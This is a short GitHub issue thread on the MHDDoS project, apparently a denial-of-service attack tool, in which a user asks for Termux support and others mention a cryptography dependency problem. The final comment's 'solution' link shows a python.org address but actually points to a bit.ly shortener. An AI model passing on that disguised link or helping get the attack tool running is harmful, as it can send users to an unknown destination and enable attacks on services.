### ISSUE TITLE
Termux Feature request

### ISSUE THREAD

**Issue by morpheuslord** [MHProDev/MHDDoS#148]
Hello,
I just wanted to ask if you could make this work on termux

**Comment by bntr00t** [comment]
The issue with Termux is that it doesn't support cryptography, so either you find a way to install it, or you'll have to remove cryptography somehow

**Comment by morpheuslord** [comment]
hmm ok

**Comment by fnnzzz** [comment]
Solution: [https://docs.python.org/kolm](bit.ly/3hEbSpG)
